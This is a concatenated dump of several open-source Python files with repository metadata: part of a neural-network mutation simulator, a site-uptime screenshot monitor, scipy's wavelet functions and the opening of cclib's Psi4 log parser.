h=h+1
self.neurons[b].upstream_axons.append(a)
self.axons[a].downstream_neuron=d
def change_axon_source(self,a,s):
if self.axons[a].active:
b=self.axons[a].upstream_neuron
h=0
while h<len(self.neurons[b].downstream_axons):
if self.neurons[b].downstream_axons[h]==a:
self.neurons[b].downstream_axons[h]=-1
h=h+1
self.axons[a].upstream_neuron=s
self.neurons[b].downstream_axons.append(a)
def change_threshold(self,n,r):
if self.neurons[n].active:
self.neurons[n].threshold=r
return True
else:
return False
def change_fireamount(self,a,r):
if self.axons[a].active:
self.axons[a].fireamount=r
return True
else:
return False
def change_decay(self,n,r):
if self.neurons[n].active:
self.neurons[n].decay=r
return True
else:
return False
def mutate(self):
choice=random.randint(0,100)
#print choice
if choice<10: #add neuron
self.add_neuron(1)
elif choice<20: # remove neuron
ok=True
found=False
a=0
while ok:
if self.neurons[a].active:
ok=False
found=True
elif a==maxneuronsperunit:
ok=False
a=a+1
if found:
self.remove_neuron(a)
#print "removed "+str(a)
elif choice<30: #add connection
ok=True
fireamount=random.randint(0,4)
fro=-1
to=-1
a=0
while ok and a<maxneuronsperunit:
f=random.randint(0,maxneuronsperunit-1)
if self.neurons[f].active:
fro=f
ok=False
a=a+1
ok=True
b=0
while ok and b<maxneuronsperunit:
t=random.randint(0,maxneuronsperunit-1)
if self.neurons[t].active:
to=t
ok=False
b=b+1
if to>-1 and fro > -1:
self.connect(fro,to,fireamount)
#print "connected "+str(fro)+" to "+str(to)+" for "+str(fireamount)
elif choice<40: #remove connection
ok=True
a=0
while ok:
h=random.randint(0,maxaxonsperunit-1)
if self.axons[h].active:
ok=False
#self.remove_axon(h)
# print "removed "+str(a)
a=a+1
if a>1000:
ok=False
elif choice<50: #change threshold WORKS
ok=True
changeamt=(random.random()-0.5)*2
while ok:
a=random.randint(0,maxneuronsperunit-1)
if self.neurons[a].active:
self.neurons[a].threshold=self.neurons[a].threshold+changeamt
# print "changed threshold for "+str(a)+ " by "+str(changeamt)
ok=False
a=a+1
elif choice<60: #change fireamount
ok=True
a=0
while ok and a<len(self.axons):
changeamt=(random.randint(-5,5))/10
if self.axons[a].active:
ok=False
self.axons[a].fireamount=self.axons[a].fireamount+changeamt
# print "changed fireamount "+str(a)+" by "+str(changeamt)
a=a+1
elif choice<70: # change axon source
a=0
b=0
kk=True
while kk:
towhere=random.randint(0,maxneuronsperunit-1)
if self.neurons[towhere].active:
kk=False
b=b+1
if b>100:
kk=False
ok=True
if b>100:
ok=False
while ok and a<len(self.axons):
if self.axons[a].active:
self.change_axon_source(a,towhere)
# print "changed axon source to "+str(towhere)+" for "+str(a)
ok=False
a=a+1
elif choice<80: # change axon destination
a=0
b=0
kk=True
while kk:
towhere=random.randint(0,maxneuronsperunit-1)
if self.neurons[towhere].active:
kk=False
b=b+1
if b>100:
kk=False
ok=True
if b>100:
ok=False
while ok and a<len(self.axons):
if self.axons[a].active:
self.change_axon_destination(a,towhere)
# print "changed axon destination to "+str(towhere)+" for "+str(a)
ok=False
a=a+1
elif choice<90: # change decay
ok=True
a=0
changeamt=(random.random()-0.5)
while ok and a<maxneuronsperunit:
if self.neurons[a].active:
self.neurons[a].decay=self.neurons[a].decay+changeamt
# print "changed decay for "+str(a)+ " by "+str(changeamt)
ok=False
a=a+1
def mutate_n(self,n):
a=0
while a<n:
self.mutate()
a=a+1
def read_outputs(self):
#OUTPUTS IN BINARY
outputs=[]
a=0
while a<len(self.output_neurons):
n=self.output_neurons[a]
if self.neurons[n].active and self.neurons[n].amount>=self.neurons[n].threshold:
outputs.append(1)
else:
outputs.append(0)
a=a+1
return outputs
def read_inputs(self):
inputs=[]
a=0
while a<len(self.input_neurons):
n=self.input_neurons[a]
if self.neurons[n].active:
inputs.append(self.neurons[n].amount)
else:
inputs.append(0)
a=a+1
return inputs
class system:
units=[unit(i) for i in range(maxunits)]
def init(self, n_units):
for i in range(0,n_units):
self.units[i].add_n_neurons(maxneuronsperunit,1)
self.units[i].designate_io(bitsize*2,bitsize)
self.units[i].active=True
def save(self):
global data
a=0
data=[] #each element is a unit
while a<maxunits:
if self.units[a].active:
r={'active_neurons':self.units[a].active_neurons,'active_axons':self.units[a].active_axons,'input_neurons':self.units[a].input_neurons,'output_neurons':self.units[a].output_neurons}
r['neurons']=[]
r['unitid']=a
#save neuron data in each active unit
b=0
while b<maxneuronsperunit:
if self.units[a].neurons[b].active:
d={'can_mutate':self.units[a].neurons[b].can_mutate,'threshold':self.units[a].neurons[b].threshold,'currentamount':self.units[a].neurons[b].amount,'decay':self.units[a].neurons[b].decay}
d['downstream_axons']=self.units[a].neurons[b].downstream_axons
d['upstream_axons']=self.units[a].neurons[b].upstream_axons
d['neuronid']=b
r['neurons'].append(d)
b=b+1
b=0
r['axons']=[]
while b<maxaxonsperunit:
if self.units[a].axons[b].active:
g={'fire_amount':self.units[a].axons[b].fireamount,'axonid':b,'upstream_neuron':self.units[a].axons[b].upstream_neuron,'downstream_neuron':self.units[a].axons[b].downstream_neuron}
r['axons'].append(g)
b=b+1
data.append(r)
a=a+1
v=json.dumps(data)
file=open('config.txt','wb')
file.write(v)
file.close()
def load(self):
global data,units
file=open('config.txt')
f=file.read()
data=json.loads(f)
a=0
while a<len(data):
r=data[a]['unitid']
self.units[r].active_axons=data[a]['active_axons']
self.units[r].active_neurons=data[a]['active_neurons']
self.units[r].input_neurons=data[a]['input_neurons']
self.units[r].output_neurons=data[a]['output_neurons']
#load neuron data
n=0
while n<len(data[a]['neurons']):
neuronid=data[a]['neurons'][n]['neuronid']
self.units[r].neurons[neuronid].threshold=data[a]['neurons'][n]['threshold']
self.units[r].neurons[neuronid].can_mutate=data[a]['neurons'][n]['can_mutate']
self.units[r].neurons[neuronid].amount=data[a]['neurons'][n]['currentamount']
self.units[r].neurons[neuronid].decay=data[a]['neurons'][n]['decay']
self.units[r].neurons[neuronid].downstream_axons=data[a]['neurons'][n]['downstream_axons']
self.units[r].neurons[neuronid].upstream_axons=data[a]['neurons'][n]['upstream_axons']
self.units[r].neurons[neuronid].active=True
n=n+1
#load axon data
g=0
while g<len(data[a]['axons']):
axon=data[a]['axons'][g]
axonid=axon['axonid']
                self.units[r].axons[axonid].fireamount=axon['fire_amount']
self.units[r].axons[axonid].upstream_neuron=axon['upstream_neuron']
self.units[r].axons[axonid].downstream_neuron=axon['downstream_neuron']
self.units[r].axons[axonid].active=True
g=g+1
a=a+1
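# --- Hedged usage sketch (not part of the original file) ---------------------
# A minimal, illustrative way to wire the classes above together: build a
# system, expose its unit list as the module-level `units` global that
# neuron.check()/axon.fire() look up, mutate one unit a few times, then run a
# cycle on binary inputs and read the outputs.  Names and values below are
# assumptions about intended use, not taken from the original repo.
if __name__ == "__main__":
    brain = system()
    brain.init(1)
    units = brain.units  # make the `global units` lookup in neuron/axon work
    brain.units[0].mutate_n(50)
    brain.units[0].cycle([1, 0] * bitsize)  # bitsize*2 binary inputs
    print brain.units[0].read_outputs()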
|
barisser/Neural
|
neural.py
|
Python
|
mit
| 16,325
|
[
"NEURON"
] |
52c2ada4f94488c441e6036dd6b15bbdf542ec02b4c1fdb4a7a0ea605a41b87a
|
#!/usr/bin/python
__author__ = 'mattdevs'
import os
import logging
import threading
import time
from datetime import datetime
import requests
from requests import ConnectionError
from selenium import webdriver
from apscheduler.scheduler import Scheduler, EVENT_JOB_EXECUTED, EVENT_JOB_ERROR
import shepherd_util
LOG_FILE = "shepherd.out"
SCREENSHOT_DIR = "screenshots"
SCREENSHOT_INTERVAL_MINS = 1
class Shepherd:
def __init__(self):
self.driver = webdriver.Chrome()
def takeScreenshot(self, siteURL):
""" Take a screenshot of the specified site and store it. """
logging.info("Taking a screenshot of %s" % siteURL)
siteDir = siteURL.replace("http://", "")
self.driver.get(siteURL)
if not os.path.exists("%s/%s" % (SCREENSHOT_DIR, siteDir)):
logging.info("Screenshot directory did not exist, creating %s" % siteURL)
os.makedirs("%s/%s" % (SCREENSHOT_DIR, siteDir))
if not self.driver.save_screenshot(
"%s/%s/%s.png" % (SCREENSHOT_DIR, siteDir, datetime.now().strftime("%Y-%m-%d %H.%M.%S"))):
logging.error("Unable to take screenshot for %s" % siteURL)
def verifySiteIsOnline(self, siteURL):
""" Issue an HTTP request to the specified url and verify that it succeeds. """
logging.info("Verifying that %s is online." % siteURL)
try:
result = requests.get(siteURL)
except ConnectionError as conErr:
logging.exception("Unable to reach %s: %s" % (siteURL, conErr))
raise
if result.status_code != 200:
logging.error("Unable to reach %s, response code: %s" % (siteURL, result.status_code))
logging.info("Site %s is online." % siteURL)
def visitAndVerifySites(self):
""" Visit all sites and verify their status. """
siteList = shepherd_util.unpackSites()
try:
for site in siteList:
self.verifySiteIsOnline(site)
self.takeScreenshot(site)
finally:
logging.info("Closing all browser windows and shutting down.")
self.driver.quit()
def eventListener(self, event):
""" Listener that can be attached to scheduler to monitor event execution. """
if event.exception:
logging.warning("Encountered exception during event processing: %s" % event.exception)
if __name__ == "__main__":
shepherd_util.setupLogging(LOG_FILE)
logging.info("Initializing scheduler.")
sched = Scheduler(daemon=True)
sched.start()
shepherd = Shepherd()
logging.info("Adding shepherd function to scheduler to run once per hour.")
sched.add_listener(shepherd.eventListener, EVENT_JOB_EXECUTED | EVENT_JOB_ERROR)
sched.add_interval_job(shepherd.visitAndVerifySites, minutes=SCREENSHOT_INTERVAL_MINS)
    # keep the main process alive for the scheduler's background thread,
    # sleeping instead of busy-waiting so we don't pin a CPU core
    while True:
        time.sleep(60)
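# --- Hedged sketch of the helpers assumed above (not part of this file) ------
# Only unpackSites() and setupLogging() from the repo's own shepherd_util
# module are referenced here; the bodies below are illustrative guesses at
# what such helpers might look like, not the actual implementation.
#
#     def unpackSites():
#         """Return the list of site URLs to monitor, one per line of a file."""
#         with open("sites.txt") as sites_file:
#             return [line.strip() for line in sites_file if line.strip()]
#
#     def setupLogging(log_file):
#         logging.basicConfig(filename=log_file, level=logging.INFO,
#                             format="%(asctime)s %(levelname)s %(message)s")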
|
mattdevs/site-shepherd
|
shepherd.py
|
Python
|
gpl-2.0
| 2,875
|
[
"VisIt"
] |
41e4b8b4330108f54d54a9751df3414f44114ca17c300973780ac5481414db1d
|
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy.dual import eig
from scipy.misc import comb
from scipy import linspace, pi, exp
from scipy.signal import convolve
__all__ = ['daub', 'qmf', 'cascade', 'morlet', 'ricker', 'cwt']
def daub(p):
"""
The coefficients for the FIR low-pass filter producing Daubechies wavelets.
p>=1 gives the order of the zero at f=1/2.
There are 2p filter coefficients.
Parameters
----------
p : int
Order of the zero at f=1/2, can have values from 1 to 34.
Returns
-------
daub : ndarray
        The 2*p coefficients of the FIR low-pass filter.
"""
sqrt = np.sqrt
if p < 1:
raise ValueError("p must be at least 1.")
if p == 1:
c = 1 / sqrt(2)
return np.array([c, c])
elif p == 2:
f = sqrt(2) / 8
c = sqrt(3)
return f * np.array([1 + c, 3 + c, 3 - c, 1 - c])
elif p == 3:
tmp = 12 * sqrt(10)
z1 = 1.5 + sqrt(15 + tmp) / 6 - 1j * (sqrt(15) + sqrt(tmp - 15)) / 6
z1c = np.conj(z1)
f = sqrt(2) / 8
d0 = np.real((1 - z1) * (1 - z1c))
a0 = np.real(z1 * z1c)
a1 = 2 * np.real(z1)
return f / d0 * np.array([a0, 3 * a0 - a1, 3 * a0 - 3 * a1 + 1,
a0 - 3 * a1 + 3, 3 - a1, 1])
elif p < 35:
# construct polynomial and factor it
if p < 35:
P = [comb(p - 1 + k, k, exact=1) for k in range(p)][::-1]
yj = np.roots(P)
else: # try different polynomial --- needs work
P = [comb(p - 1 + k, k, exact=1) / 4.0**k
for k in range(p)][::-1]
yj = np.roots(P) / 4
# for each root, compute two z roots, select the one with |z|>1
# Build up final polynomial
c = np.poly1d([1, 1])**p
q = np.poly1d([1])
for k in range(p - 1):
yval = yj[k]
part = 2 * sqrt(yval * (yval - 1))
const = 1 - 2 * yval
z1 = const + part
if (abs(z1)) < 1:
z1 = const - part
q = q * [1, -z1]
q = c * np.real(q)
# Normalize result
q = q / np.sum(q) * sqrt(2)
return q.c[::-1]
else:
raise ValueError("Polynomial factorization does not work "
"well for p too large.")
def qmf(hk):
"""
Return high-pass qmf filter from low-pass
Parameters
----------
hk : array_like
        Coefficients of low-pass filter.
"""
N = len(hk) - 1
asgn = [{0: 1, 1:-1}[k % 2] for k in range(N + 1)]
return hk[::-1] * np.array(asgn)
def wavedec(amn, hk):
gk = qmf(hk)
return NotImplemented
def cascade(hk, J=7):
"""
Return (x, phi, psi) at dyadic points ``K/2**J`` from filter coefficients.
Parameters
----------
hk : array_like
Coefficients of low-pass filter.
J : int, optional
Values will be computed at grid points ``K/2**J``. Default is 7.
Returns
-------
x : ndarray
The dyadic points ``K/2**J`` for ``K=0...N * (2**J)-1`` where
``len(hk) = len(gk) = N+1``.
phi : ndarray
The scaling function ``phi(x)`` at `x`:
``phi(x) = sum(hk * phi(2x-k))``, where k is from 0 to N.
    psi : ndarray
        The wavelet function ``psi(x)`` at `x`:
        ``psi(x) = sum(gk * phi(2x-k))``, where k is from 0 to N and
        ``gk = qmf(hk)`` is the matching high-pass (QMF) filter.
Notes
-----
The algorithm uses the vector cascade algorithm described by Strang and
Nguyen in "Wavelets and Filter Banks". It builds a dictionary of values
and slices for quick reuse. Then inserts vectors into final vector at the
end.
"""
N = len(hk) - 1
if (J > 30 - np.log2(N + 1)):
raise ValueError("Too many levels.")
if (J < 1):
raise ValueError("Too few levels.")
# construct matrices needed
nn, kk = np.ogrid[:N, :N]
s2 = np.sqrt(2)
# append a zero so that take works
thk = np.r_[hk, 0]
gk = qmf(hk)
tgk = np.r_[gk, 0]
indx1 = np.clip(2 * nn - kk, -1, N + 1)
indx2 = np.clip(2 * nn - kk + 1, -1, N + 1)
m = np.zeros((2, 2, N, N), 'd')
m[0, 0] = np.take(thk, indx1, 0)
m[0, 1] = np.take(thk, indx2, 0)
m[1, 0] = np.take(tgk, indx1, 0)
m[1, 1] = np.take(tgk, indx2, 0)
m *= s2
# construct the grid of points
x = np.arange(0, N * (1 << J), dtype=np.float) / (1 << J)
phi = 0 * x
psi = 0 * x
# find phi0, and phi1
lam, v = eig(m[0, 0])
ind = np.argmin(np.absolute(lam - 1))
# a dictionary with a binary representation of the
# evaluation points x < 1 -- i.e. position is 0.xxxx
v = np.real(v[:, ind])
# need scaling function to integrate to 1 so find
# eigenvector normalized to sum(v,axis=0)=1
sm = np.sum(v)
if sm < 0: # need scaling function to integrate to 1
v = -v
sm = -sm
bitdic = {}
bitdic['0'] = v / sm
bitdic['1'] = np.dot(m[0, 1], bitdic['0'])
step = 1 << J
phi[::step] = bitdic['0']
phi[(1 << (J - 1))::step] = bitdic['1']
psi[::step] = np.dot(m[1, 0], bitdic['0'])
psi[(1 << (J - 1))::step] = np.dot(m[1, 1], bitdic['0'])
# descend down the levels inserting more and more values
# into bitdic -- store the values in the correct location once we
# have computed them -- stored in the dictionary
# for quicker use later.
prevkeys = ['1']
for level in range(2, J + 1):
newkeys = ['%d%s' % (xx, yy) for xx in [0, 1] for yy in prevkeys]
fac = 1 << (J - level)
for key in newkeys:
# convert key to number
num = 0
for pos in range(level):
if key[pos] == '1':
num += (1 << (level - 1 - pos))
pastphi = bitdic[key[1:]]
ii = int(key[0])
temp = np.dot(m[0, ii], pastphi)
bitdic[key] = temp
phi[num * fac::step] = temp
psi[num * fac::step] = np.dot(m[1, ii], pastphi)
prevkeys = newkeys
return x, phi, psi
def morlet(M, w=5.0, s=1.0, complete=True):
"""
Complex Morlet wavelet.
Parameters
----------
M : int
Length of the wavelet.
w : float
Omega0. Default is 5
s : float
Scaling factor, windowed from ``-s*2*pi`` to ``+s*2*pi``. Default is 1.
complete : bool
Whether to use the complete or the standard version.
Returns
-------
morlet : (M,) ndarray
See Also
--------
scipy.signal.gausspulse
Notes
-----
The standard version::
pi**-0.25 * exp(1j*w*x) * exp(-0.5*(x**2))
This commonly used wavelet is often referred to simply as the
Morlet wavelet. Note that this simplified version can cause
admissibility problems at low values of w.
The complete version::
pi**-0.25 * (exp(1j*w*x) - exp(-0.5*(w**2))) * exp(-0.5*(x**2))
The complete version of the Morlet wavelet, with a correction
term to improve admissibility. For w greater than 5, the
correction term is negligible.
Note that the energy of the return wavelet is not normalised
according to s.
The fundamental frequency of this wavelet in Hz is given
by ``f = 2*s*w*r / M`` where r is the sampling rate.
"""
x = linspace(-s * 2 * pi, s * 2 * pi, M)
output = exp(1j * w * x)
if complete:
output -= exp(-0.5 * (w**2))
output *= exp(-0.5 * (x**2)) * pi**(-0.25)
return output
def ricker(points, a):
"""
Return a Ricker wavelet, also known as the "Mexican hat wavelet".
It models the function:
``A (1 - x^2/a^2) exp(-x^2/2 a^2)``,
    where ``A = 2/sqrt(3a)pi^1/4``.
Parameters
----------
points : int
Number of points in `vector`.
Will be centered around 0.
a : scalar
Width parameter of the wavelet.
Returns
-------
vector : (N,) ndarray
Array of length `points` in shape of ricker curve.
Examples
--------
>>> from scipy import signal
>>> import matplotlib.pyplot as plt
>>> points = 100
>>> a = 4.0
>>> vec2 = signal.ricker(points, a)
>>> print(len(vec2))
100
>>> plt.plot(vec2)
>>> plt.show()
"""
A = 2 / (np.sqrt(3 * a) * (np.pi**0.25))
wsq = a**2
vec = np.arange(0, points) - (points - 1.0) / 2
xsq = vec**2
mod = (1 - xsq / wsq)
gauss = np.exp(-xsq / (2 * wsq))
total = A * mod * gauss
return total
def cwt(data, wavelet, widths):
"""
Continuous wavelet transform.
Performs a continuous wavelet transform on `data`,
using the `wavelet` function. A CWT performs a convolution
with `data` using the `wavelet` function, which is characterized
by a width parameter and length parameter.
Parameters
----------
data : (N,) ndarray
data on which to perform the transform.
wavelet : function
Wavelet function, which should take 2 arguments.
The first argument is the number of points that the returned vector
will have (len(wavelet(width,length)) == length).
The second is a width parameter, defining the size of the wavelet
(e.g. standard deviation of a gaussian). See `ricker`, which
satisfies these requirements.
widths : (M,) sequence
Widths to use for transform.
Returns
-------
cwt: (M, N) ndarray
        Will have shape of (len(widths), len(data)).
Notes
-----
>>> length = min(10 * width[ii], len(data))
>>> cwt[ii,:] = scipy.signal.convolve(data, wavelet(length,
... width[ii]), mode='same')
Examples
--------
>>> from scipy import signal
>>> sig = np.random.rand(20) - 0.5
>>> wavelet = signal.ricker
>>> widths = np.arange(1, 11)
>>> cwtmatr = signal.cwt(sig, wavelet, widths)
"""
output = np.zeros([len(widths), len(data)])
for ind, width in enumerate(widths):
wavelet_data = wavelet(min(10 * width, len(data)), width)
output[ind, :] = convolve(data, wavelet_data,
mode='same')
return output
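# --- Hedged usage sketch (not part of the original module) -------------------
# Ties together the functions documented above: daub(p) yields the low-pass
# Daubechies filter, qmf() derives the matching high-pass filter, cascade()
# evaluates the scaling function phi and wavelet psi on a dyadic grid, and
# cwt() convolves a signal with ricker wavelets.  The p=4 choice, J=7 grid
# depth, and test signal are illustrative only.
if __name__ == "__main__":
    hk = daub(4)                     # 2*p = 8 low-pass coefficients
    gk = qmf(hk)                     # matching high-pass (QMF) coefficients
    x, phi, psi = cascade(hk, J=7)   # phi/psi sampled at the points K/2**7
    print(len(hk), len(gk))          # 8 8
    print(x.shape, phi.shape, psi.shape)
    widths = np.arange(1, 11)
    sig = np.cos(2 * pi * linspace(0, 1, 128))
    print(cwt(sig, ricker, widths).shape)   # (10, 128)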
|
juliantaylor/scipy
|
scipy/signal/wavelets.py
|
Python
|
bsd-3-clause
| 10,246
|
[
"Gaussian"
] |
b34f3ab40d5335cbaf2a2a9343601e8f01af0b685137d9dd8a30089b79b5a7fd
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017, the cclib development team
#
# This file is part of cclib (http://cclib.github.io) and is distributed under
# the terms of the BSD 3-Clause License.
"""Parser for Psi4 output files."""
from collections import namedtuple
import numpy
from cclib.parser import data
from cclib.parser import logfileparser
from cclib.parser import utils
class Psi4(logfileparser.Logfile):
"""A Psi4 log file."""
def __init__(self, *args, **kwargs):
super().__init__(logname="Psi4", *args, **kwargs)
def __str__(self):
"""Return a string representation of the object."""
return "Psi4 log file %s" % (self.filename)
def __repr__(self):
"""Return a representation of the object."""
return 'Psi4("%s")' % (self.filename)
def before_parsing(self):
# Early beta versions of Psi4 normalize basis function
# coefficients when printing.
self.version_4_beta = False
# This is just used to track which part of the output we are in, with
# changes triggered by ==> things like this <==.
self.section = None
# There are also sometimes subsections within each section, denoted
# with =>/<= rather than ==>/<==.
self.subsection = None
def after_parsing(self):
super(Psi4, self).after_parsing()
# Newer versions of Psi4 don't explicitly print the number of atoms.
if not hasattr(self, 'natom'):
if hasattr(self, 'atomnos'):
self.set_attribute('natom', len(self.atomnos))
def normalisesym(self, label):
"""Use standard symmetry labels instead of Psi4 labels.
To normalise:
(1) `App` -> `A"`
(2) `Ap` -> `A'`
"""
return label.replace("pp", '"').replace("p", "'")
# Match the number of skipped lines required based on the type of
# gradient present (determined from the header), as otherwise the
# parsing is identical.
GradientInfo = namedtuple('GradientInfo', ['gradient_type', 'header', 'skip_lines'])
GRADIENT_TYPES = {
'analytic': GradientInfo('analytic',
'-Total Gradient:',
['header', 'dash header']),
'numerical': GradientInfo('numerical',
'## F-D gradient (Symmetry 0) ##',
['Irrep num and total size', 'b', '123', 'b']),
}
GRADIENT_HEADERS = set([gradient_type.header
for gradient_type in GRADIENT_TYPES.values()])
def extract(self, inputfile, line):
"""Extract information from the file object inputfile."""
# Extract the version number and the version control
# information, if it exists.
if "An Open-Source Ab Initio Electronic Structure Package" in line:
version_line = next(inputfile)
tokens = version_line.split()
package_version = tokens[1].split("-")[-1]
self.metadata["legacy_package_version"] = package_version
# Keep track of early versions of Psi4.
if "beta" in package_version:
self.version_4_beta = True
# `beta2+` -> `0!0.beta2`
package_version = "0!0.{}".format(package_version)
if package_version[-1] == "+":
# There is no good way to keep the bare plus sign around,
# but this version is so old...
package_version = package_version[:-1]
else:
package_version = "1!{}".format(package_version)
self.skip_line(inputfile, "blank")
line = next(inputfile)
if "Git:" in line:
tokens = line.split()
assert tokens[1] == "Rev"
revision = '-'.join(tokens[2:]).replace("{", "").replace("}", "")
dev_flag = "" if "dev" in package_version else ".dev"
package_version = "{}{}+{}".format(
package_version, dev_flag, revision
)
self.metadata["package_version"] = package_version
# This will automatically change the section attribute for Psi4, when encountering
# a line that <== looks like this ==>, to whatever is in between.
if (line.strip()[:3] == "==>") and (line.strip()[-3:] == "<=="):
self.section = line.strip()[4:-4]
if self.section == "DFT Potential":
self.metadata["methods"].append("DFT")
# There is also the possibility of subsections.
if (line.strip()[:2] == "=>") and (line.strip()[-2:] == "<="):
self.subsection = line.strip()[3:-3]
# Determine whether or not the reference wavefunction is
# restricted, unrestricted, or restricted open-shell.
if line.strip() == "SCF":
while "Reference" not in line:
line = next(inputfile)
self.reference = line.split()[0]
# Work with a complex reference as if it's real.
if self.reference[0] == 'C':
self.reference = self.reference[1:]
# Parse the XC density functional
# => Composite Functional: B3LYP <=
if self.section == "DFT Potential" and "composite functional" in line.lower():
chomp = line.split()
functional = chomp[-2]
self.metadata["functional"] = functional
# ==> Geometry <==
#
# Molecular point group: c2h
# Full point group: C2h
#
# Geometry (in Angstrom), charge = 0, multiplicity = 1:
#
# Center X Y Z
# ------------ ----------------- ----------------- -----------------
# C -1.415253322400 0.230221785400 0.000000000000
# C 1.415253322400 -0.230221785400 0.000000000000
# ...
#
if (self.section == "Geometry") and ("Molecular point group" in line):
point_group_abelian = line.split()[3].lower()
line = next(inputfile)
if "Full point group" in line:
point_group_full = line.split()[3].lower()
else:
# TODO this isn't right, need to "know" about symmetry.
point_group_full = point_group_abelian
self.metadata['symmetry_detected'] = point_group_full
self.metadata['symmetry_used'] = point_group_abelian
if (self.section == "Geometry") and ("Geometry (in Angstrom), charge" in line):
assert line.split()[3] == "charge"
charge = int(line.split()[5].strip(','))
self.set_attribute('charge', charge)
assert line.split()[6] == "multiplicity"
mult = int(line.split()[8].strip(':'))
self.set_attribute('mult', mult)
self.skip_line(inputfile, "blank")
line = next(inputfile)
# Usually there is the header and dashes, but, for example, the coordinates
# printed when a geometry optimization finishes do not have it.
if line.split()[0] == "Center":
self.skip_line(inputfile, "dashes")
line = next(inputfile)
elements = []
coords = []
atommasses = []
while line.strip():
chomp = line.split()
el, x, y, z = chomp[:4]
if len(el) > 1:
el = el[0] + el[1:].lower()
elements.append(el)
coords.append([float(x), float(y), float(z)])
# Newer versions of Psi4 print atomic masses.
if len(chomp) == 5:
atommasses.append(float(chomp[4]))
line = next(inputfile)
# The 0 is to handle the presence of ghost atoms.
self.set_attribute('atomnos', [self.table.number.get(el, 0) for el in elements])
if not hasattr(self, 'atomcoords'):
self.atomcoords = []
            # This condition discards any repeated coordinates that Psi4 prints. For example,
            # geometry optimizations will print the coordinates at the beginning of an SCF
            # section and also at the start of the gradient calculation.
if len(self.atomcoords) == 0 \
or (self.atomcoords[-1] != coords and not hasattr(self, 'finite_difference')):
self.atomcoords.append(coords)
if len(atommasses) > 0:
if not hasattr(self, 'atommasses'):
self.atommasses = atommasses
# Psi4 repeats the charge and multiplicity after the geometry.
if (self.section == "Geometry") and (line[2:16].lower() == "charge ="):
charge = int(line.split()[-1])
self.set_attribute('charge', charge)
if (self.section == "Geometry") and (line[2:16].lower() == "multiplicity ="):
mult = int(line.split()[-1])
self.set_attribute('mult', mult)
# The printout for Psi4 has a more obvious trigger for the SCF parameter printout.
if (self.section == "Algorithm") and (line.strip() == "==> Algorithm <==") \
and not hasattr(self, 'finite_difference'):
self.skip_line(inputfile, 'blank')
line = next(inputfile)
while line.strip():
if "Energy threshold" in line:
etarget = float(line.split()[-1])
if "Density threshold" in line:
dtarget = float(line.split()[-1])
line = next(inputfile)
if not hasattr(self, "scftargets"):
self.scftargets = []
self.scftargets.append([etarget, dtarget])
# This section prints contraction information before the atomic basis set functions and
# is a good place to parse atombasis indices as well as atomnos. However, the section this line
# is in differs between HF and DFT outputs.
#
# -Contraction Scheme:
# Atom Type All Primitives // Shells:
# ------ ------ --------------------------
# 1 C 6s 3p // 2s 1p
# 2 C 6s 3p // 2s 1p
# 3 C 6s 3p // 2s 1p
# ...
if self.section == "Primary Basis":
if line[2:12] == "Basis Set:":
self.metadata["basis_set"] = line.split()[2]
if (self.section == "Primary Basis" or self.section == "DFT Potential") and line.strip() == "-Contraction Scheme:":
self.skip_lines(inputfile, ['headers', 'd'])
atomnos = []
atombasis = []
atombasis_pos = 0
line = next(inputfile)
while line.strip():
element = line.split()[1]
if len(element) > 1:
element = element[0] + element[1:].lower()
atomnos.append(self.table.number[element])
# To count the number of atomic orbitals for the atom, sum up the orbitals
# in each type of shell, times the numbers of shells. Currently, we assume
# the multiplier is a single digit and that there are only s and p shells,
# which will need to be extended later when considering larger basis sets,
# with corrections for the cartesian/spherical cases.
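                # Worked example (added for illustration): a scheme line ending
                # in "// 2s 1p" gives ao_count = 1*2 + 3*1 = 5 atomic orbitals.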
ao_count = 0
shells = line.split('//')[1].split()
for s in shells:
count, type = s
multiplier = 3*(type == 'p') or 1
ao_count += multiplier*int(count)
if len(atombasis) > 0:
atombasis_pos = atombasis[-1][-1] + 1
atombasis.append(list(range(atombasis_pos, atombasis_pos+ao_count)))
line = next(inputfile)
self.set_attribute('natom', len(atomnos))
self.set_attribute('atomnos', atomnos)
self.set_attribute('atombasis', atombasis)
# The atomic basis set is straightforward to parse, but there are some complications
        # when symmetry is used, because in that case Psi4 only prints the symmetry-unique atoms,
# and the list of symmetry-equivalent ones is not printed. Therefore, for simplicity here
        # when an atom is missing (atom indices are printed) assume the atomic orbitals of the
# last atom of the same element before it. This might not work if a mixture of basis sets
# is used somehow... but it should cover almost all cases for now.
#
        # Note that Psi4 also prints normalized coefficients (details below).
#
# ==> AO Basis Functions <==
#
# [ STO-3G ]
# spherical
# ****
# C 1
# S 3 1.00
# 71.61683700 2.70781445
# 13.04509600 2.61888016
# ...
if (self.section == "AO Basis Functions") and (line.strip() == "==> AO Basis Functions <=="):
def get_symmetry_atom_basis(gbasis):
"""Get symmetry atom by replicating the last atom in gbasis of the same element."""
missing_index = len(gbasis)
missing_atomno = self.atomnos[missing_index]
ngbasis = len(gbasis)
last_same = ngbasis - self.atomnos[:ngbasis][::-1].index(missing_atomno) - 1
return gbasis[last_same]
dfact = lambda n: (n <= 0) or n * dfact(n-2)
# Early beta versions of Psi4 normalize basis function
# coefficients when printing.
if self.version_4_beta:
def get_normalization_factor(exp, lx, ly, lz):
norm_s = (2*exp/numpy.pi)**0.75
if lx + ly + lz > 0:
nom = (4*exp)**((lx+ly+lz)/2.0)
den = numpy.sqrt(dfact(2*lx-1) * dfact(2*ly-1) * dfact(2*lz-1))
return norm_s * nom / den
else:
return norm_s
else:
get_normalization_factor = lambda exp, lx, ly, lz: 1
self.skip_lines(inputfile, ['b', 'basisname'])
line = next(inputfile)
spherical = line.strip() == "spherical"
if hasattr(self, 'spherical_basis'):
assert self.spherical_basis == spherical
else:
self.spherical_basis = spherical
gbasis = []
self.skip_line(inputfile, 'stars')
line = next(inputfile)
while line.strip():
element, index = line.split()
if len(element) > 1:
element = element[0] + element[1:].lower()
index = int(index)
# This is the code that adds missing atoms when symmetry atoms are excluded
# from the basis set printout. Again, this will work only if all atoms of
# the same element use the same basis set.
while index > len(gbasis) + 1:
gbasis.append(get_symmetry_atom_basis(gbasis))
gbasis.append([])
line = next(inputfile)
while line.find("*") == -1:
# The shell type and primitive count is in the first line.
shell_type, nprimitives, _ = line.split()
nprimitives = int(nprimitives)
# Get the angular momentum for this shell type.
momentum = {'S': 0, 'P': 1, 'D': 2, 'F': 3, 'G': 4, 'H': 5, 'I': 6}[shell_type.upper()]
# Read in the primitives.
primitives_lines = [next(inputfile) for i in range(nprimitives)]
